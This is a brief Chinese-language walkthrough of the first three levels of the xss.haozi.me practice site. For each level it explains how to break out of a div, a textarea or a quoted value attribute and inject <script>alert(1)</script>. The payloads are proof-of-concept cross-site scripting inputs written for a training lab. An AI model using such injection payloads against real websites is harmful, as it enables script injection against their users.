本次绕过在网站xss.haozi.me进行的绕过 练习网站
输出弹出就成功
0x00:闭合标签
本题很简单只需要闭合标签,并输入弹窗标签
</div><script>alert(1)</script><div>
0x01:闭合标签,textarea内元素为文本元素
本题很简单只需要闭合标签,并输入弹窗标签。不能在textarea标签直接写。因为编码无法识别因为会使他识别为文本
</textarea><script>alert(1)</script><texarea>
0x02:闭合引号
题目我们输入的内容在value里面,为此我们要跳出来,再输入弹窗语句。因此我们要先闭合双引号再写弹窗语句。
aa" ><script>alert(1)</script>